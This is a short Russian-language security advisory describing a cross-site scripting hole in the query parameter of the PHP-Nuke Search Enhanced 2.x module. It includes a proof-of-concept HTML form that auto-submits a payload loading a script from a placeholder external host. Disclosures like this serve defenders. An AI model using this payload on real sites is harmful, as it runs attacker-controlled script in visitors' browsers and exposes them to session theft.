Программа: PHP-Nuke Search Enhanced 2.x

Уязвимость позволяет удаленному
пользователю произвести XSS нападение.
Уязвимость существует в модуле Search Enhanced из-за
недостаточной обработки входных данных в
параметре query. Удаленный пользователь может
с помощью специально сформированного
запроса выполнить произвольный HTML сценарий
в браузере жертвы в контексте безопасности
уязвимого сайта.

Пример:

<html>
<form name=searchform method=post action=http://[target]/modules.php?name=Search_Enhanced>
<input type="text" name="query" size="15" value='<script
src=http://[location]/js.js></script>’>
<input type=submit name=sub>
<script>document.searchform.sub.click() </script>
</html>



Оставить мнение